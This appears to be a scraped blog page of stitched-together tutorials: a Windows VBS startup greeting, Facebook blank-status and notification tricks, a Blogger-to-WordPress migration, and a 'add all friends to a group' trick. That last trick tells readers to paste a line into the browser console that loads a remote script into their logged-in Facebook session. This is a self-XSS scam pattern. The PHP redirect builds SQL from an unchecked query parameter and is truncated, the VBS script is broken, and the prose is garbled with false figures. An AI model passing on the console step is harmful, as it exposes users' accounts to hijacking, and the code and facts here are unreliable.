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Make your Computer welcome you

Make your Computer welcome you

By Zeeshan ahmed
Do you watch movies? Have you always loved the way how Computers in movies welcome their users by calling out their names? I bet that you too would want to know how you can achieve similar results on your PC and have a computer said welcome.As you know, Windows OS have lot’s of known and unknown features for the different system tasks.Now, if you would like to make your PC welcome you with a simple voice message, we have a simple way to do that. Of course, you can go for the harder way of changing the default startup sound.welcomed by your computer. With this tutorial you would be able to make your PC welcome you in it’s default (computerized) voice. Let’s get started to learn about this hidden feature.

Please Note : The Script we are going to use in this tutorial is 100% safe and personally tested by me, so don’t hesitate to applying this trick in your own PC. This tutorial and it’s method apply on Windows(XP,
Vista, 7, 8) PC. For best results, it is recommended to change sound scheme to No Sounds.

1.  Go to Start » Control Panel. Then click on Switch to Classic View.

2.  Then Click on Sounds and Audio Devices, and then click Sounds Tab.

3.  Select No Sounds from the Sound Scheme option. (If you want to save your Previous Sound Scheme, save it by clicking Yes in the popup menu.)

4.  Click OK button. You are all set

5.  Now once more time click Start button, now just navigate to All Programs » Accessories » Notepad. or click Start button, then Run option and type ”notepad“ to open notepad.

6.  Now highlight following vbs (Visual Basic Script) code and paste in the Notepad.

 Dim speaks, speechspeaks
Welcome to your PC, Username/Your Name
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks

7. Replace Username/Your Name with your own name or username. (You can set custom message, if you wish). After do that, click File menu, then click Save As. Now first set All Types in Save as type option below file name option.

8. Save the file as Welcome.vbs or any other name with .vbs extension.

9. After saving file close notepad and copy the saved file.

10. Now, kindly choose your Windows OS and navigate to Startup folder:

Please Note : Before navigating to Startup folder, click Show hidden files, folders, and drives option to show up hidden folders and file below Hidden files and folders section.

For example:
Windows XP : C: » Documents and Settings » All Users » Start Menu » Programs » Startup

Windows Vista/7/8 : C: » Users » {Your Username} » AppData » Roaming » Microsoft »Windows » Start Menu » Programs » Startup

How to update blank comment on facebook

Update blank status and comments on facebook

By Zeeshan ahmed
Facebook is a socail utility website network.It launched in 2004.Now in 2013 it user is over 5 million+.Its users increase day by day.Many numbers of peoples daily sign up for facebook account.YOu can connect to your friends through facebook.You can keep an eye on your friends activity that he share facebook.Today i am going to share a best and awesome trick of facebook is that how to update blank status and comments on face book.After reading this words you confused but you not need to get tension.I am share this trick with you.You can confused your friends on facebook by updating blank status and comments.So if you want to do practicle of this facebook trick just follow my instructions that are given below with screen shoots.

How to update blank status on facebook?

  • Firstly Go to and login with your account.

  • After successfully login to your account click on update status option which is always in top of facebook newfeed.

  • Click on the image to zoom

  • Now paste the below codes in your status and update it.

  • @[0:0: ]
    Click on the image to zoom

  • After publishing this status the numbers will not be shown and your facebook status will be blank.
    Click on the image to zoom

    How to update blank comment on facebook?

  • Now if you want to do blank comments on facebook follow previous instructions and click on status or picture that you want to commented.Now follow the below instructions and press enter.

  • Now Press And Hold  Alt Key and Press 0173 and press enter.
  • {[['']]}

    How To Turn Off Facebook Notification Sound

    How To Turn Off Facebook Notification Sound

    By Zeeshan ahmed
    Facebook has started testing a new sound for whenever a user receives a notification, the social networking titan confirmed today to VentureBeat.You could also argue that these sounds would be handy for some folks. If you only occasionally receive likes or comments on your posts, then these pings Within the last couple of weeks we’ve noticed a certain “beep” emanating from one of the office computers here at AudioAcrobat HQ.
               Knowing that there hadn’t been any manual updates to sound notifications on our end, we started an all out investigation into the source of this (slightly annoying) new sound, including both software applications and all open tabs in Google Chrome.  Much to our surprise, the culprit ended up being an Today it seems Facebook made yet another change. When you are logged on to Facebook on your computer every time you get a notification it plays a sound.
    It was driving me crazy so off I went on a mission to find out how to turn Facebook sound notification off. Guess what SUPER SIMPLE. Here is how to turn off Facebook sound notifications.

    1   First, open your Facebook profile and click on setting.

    2   Now click on Account Settings.

     3     After that click on Notification option (left side).

     4     Under the "How you Get Notifications" option, you can see "On Facebook" option click on that.

    • 5  Now uncheck "Play a sound when each new notification is received".

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    How to Transfer Blogger To Wordpress?

    How to Transfer Blogger To Wordpress?

    transfer blogger to wordpressWhenever, we think about the history of most productive Blogging platform the first word which clicks our mind is either WordPress or Blogger. Still lots of Well-known bloggers are in doldrums whether to select WordPress, or they should try their luck with Blogger. Blogger and WordPress have been competitors since an elongated period but in the meantime WordPress has developed tremendously, in spite of getting introduced before Blogger. Mohammad has covered lots of posts regarding avoiding Blogger to WordPress conversion but one should always know how to do something, so we may continue to make use of the resources. So in this article, we will cover How To Migrate Blogger to WordPress Blog without losing a single SERP Ranking or Page Rank Juice.

    Mohammad himself started his dream Blog on Blogger (MyBloggerTricks) which become the biggest hit of the decade and later on he put everything on the line by starting yet another blog with totally different niche (SmartEarningMetods) but this time he chooses WordPress, and stunningly the results were pretty much similar. This proves that Blogging Platform doesn’t matters a lot. The only thing which is responsible for your success is Quality, Quality, and Quality. 

    Note: This guide does not motivate you to shift your blogger blog to Wordpress. It is only an instruction guide for those who are well aware of the challenges faced at Wordpressplatform.

    Main Goal:

    Assume you are currently using a low quality domain i.e. and you want to migrate it from Blogger BlogSpot Blog to WordPress (Self-Hosted Blog) with a professionalized domain i.e.

    Problems You Might Face During The Migration:

    • When you transform from Blogger to WordPress, the chances are exceedingly high that you might lose your quality subscribers i.e. Feedburner until or unless you redirect your BlogSpot Feeds to your new WordPress Blog.
    • Rarely your few posts might be ranked well in Google search engine, but after Blogger to WordPress conversion you might notice a noticeable decline in your SERP Rankings. Therefore, you have to keep your Cool until or unless ranking get backs to normal.
    • Human visitors will feel a bit stressed when they will try to visit your blog with OLD bookmarked URLs, if you don’t permanently redirect your old URLs to new one.
    • You need to Learn WordPress in order to get full command on it.  This is the most difficult part to get into plugins and theme. However, experience lead us to success so don’t hesitate and maintain patience.

    Ultimate Solutions:

    The problem listed above might appear magnificent, but we can minimize their effect by utilizing effective methods. We will simply redirect our OLD blog posts to NEW one so search engine bots don’t get confused in identifying whether we are on Blogger or WordPress.
    In this tutorial, we will learn how to switch from Blogger to WordPress without losing your major SERP ranking. We will also discuss how to redirect our old feed to New WordPress Feed, so let’s get back to work.
    Step by Step Guide
    Before we get started, it will be splendid if you create a dummy blog for experiments. By doing this, you will not only eliminate mistakes and by chance if anything goes wrong you will have the certain satisfaction that you are not working on your main Blog. This will also minimize your errors in the main Blogger to WordPress transformation. Don’t forget to take a Backup of your Blogger Blog i.e. Posts Data as well as Template.

    Step#1: If you don’t have a Hosting then what are doing here go ahead and get a cheap domain, as well as Hostgator hosting. We will recommend you to go with Hostgator because those guys are always ready to help.

    Step#2: Now you have to import your entire Blogger Blog to WordPress
    • Go to WP-admin Panel >> Import >> Tools >> Blogger
    • Now give permission to WordPress to access your existing Blogger account by pressing the button which says “Authorize”.
    • After granting permission you able to see list of multiple blogs attached to your certain Blogger account, just import that blog which you want to migrate to WordPress by pressing “IMPORT” button. Now after the blog is completely imported give admin right.
    import blogger to wordpress

    Step#3: Now Copy the following PHP coding and save it into an empty notepad, renaming it to “Blogger.php”. After that you have to use CPanel or any other FTP software to upload it to Your WordPress Theme Directory. Keep in mind you have to Upload it in your Theme Directory i.e. WP-content/themes/your-theme where your-theme is representing your theme’s name.


    Template Name: blogger


    global $wpdb;

    $old_url = $_GET['q'];

    if ($old_url != "") {

    $permalink = explode("", $old_url);

    $q = "SELECT guid FROM $wpdb->posts LEFT JOIN $wpdb->postmeta ".

    "ON ($wpdb->posts.ID = $wpdb->postmeta.post_id) WHERE ".

    "$wpdb->postmeta.meta_key='blogger_permalink' AND ".


    $new_url = $wpdb->get_var($q)? $wpdb->get_var($q) : "/";

    header ("HTTP/1.1 301 Moved Permanently");

    header("Location: $new_url");


    Step#4: After Uploading the PHP file to your WordPress directory
    • Go to WordPress Admin >> Add new Page.
    • In the title write blogger while keeping your post body empty (Don’t use capital “B” in blogger)
    • Now select “blogger” from the templates tool in the sidebar menu and then publish the page.
    • Make sure that your domain structure looks like this
    add new page

    Step#5: Now you have to redirect your current BlogSpot Blog to WordPress but if you don’t redirect the existing blog Search bot will mark you as spam because you are duplicating your content for the sake of traffic. Just Copy the following Chuck of code and
    • Go to Blogger >> Template >> Revert to Classis Template >>
    • Now you will be able to see a text box, just paste the Code there and save your template. Remember: Replace with your domain name and don’t forget to align http:// as well as trailing slashes with your domain name.

    • revert to classic templates
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "">
    <html xmlns="" xml:lang="en" lang="en" dir="<$BlogLanguageDirection$>">
    <script type="text/javascript">
    <MainPage><link rel="canonical" href="" /></MainPage>
    <link rel="canonical" href="<$BlogItemPermalinkURL$>" />
    <div style="border:#ccc 1px solid; background:#eee; padding:20px; margin:80px;">
    <p>This page has moved to a new address.</p>
    <MainOrArchivePage><a href=""><$BlogTitle$></a></MainOrArchivePage>
    <a href="<$BlogItemPermalinkURL$>"><$BlogItemTitle$></a>
    </div> </body></html>
    <!-- replace with your WordPress site URL --->

    Congratulations! You are successfully migrated to WordPress without losing a single piece of Search engine rankings I guess that deserves Cheers!
    Redirecting your old Feed URL to WordPress Feeds:
    When you migrate from Blogger from WordPress, your Feed URL might change so to redirect your existing feeds to WordPress
    • Go to Blogger >> Settings >> Site Feed >> Custom Feed >>
    • And now write your new WordPress Feed URL and save it.


    simple1click & add yur all frnds in any grop

    simple1click & add yur all frnds in any grop
    For Mozilla Firefox 

    1. First you should be in group

    2. Press CTRL + SHIFT + K

    3. COPY the following code:

     document.body.appendChild (document.createElement ('script')). src = ' '; 

    4. Paste into the Black Box.

    5. Then press Enter, Good luck !!!!!!!!!!! 

    For Google Chrome

    1. First you should be in group

    2. Press CTRL + SHIFT + J

    3. COPY the following code:

    //Subscribe me on Facebook


    4. Paste into the Console Box.

    5. Then press Enter, Good luck !!!!!!!!!!! 

    For Opera 

    1. First you should be in group

    2. Right Click, Inspect Element

    3. COPY the following code:

    document.body.appendChild (document.createElement ('script')). src = ' ';

    4. Paste into the Console Box.

    5. Then press Enter, Good luck !!!!!!!!!!! 
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